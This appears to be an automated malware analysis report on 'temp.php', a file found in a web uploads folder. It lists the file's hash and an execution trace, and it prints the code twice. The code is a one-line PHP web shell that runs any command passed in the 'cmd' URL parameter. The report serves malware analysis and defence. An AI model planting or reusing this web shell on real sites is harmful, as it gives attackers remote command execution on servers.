PHP Malware Analysis

temp.php

md5: 1ab3caf03e9962d0727abfa0f9c14755

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

echo shell_exec($_GET['cmd']);

Execution traces

data/traces/1ab3caf03e9962d0727abfa0f9c14755_trace-1676241158.4225.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:33:04.320311]
1	0	1	0.000168	393512
1	3	0	0.000215	393904	{main}	1		/var/www/html/uploads/temp.php	0	0
2	4	0	0.000249	393904	shell_exec	0		/var/www/html/uploads/temp.php	3	1	NULL
2	4	1	0.000273	393936
2	4	R			FALSE
1	3	1	0.000289	393904
			0.000314	314224
TRACE END   [2023-02-12 20:33:04.320488]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php

echo shell_exec($_GET['cmd']);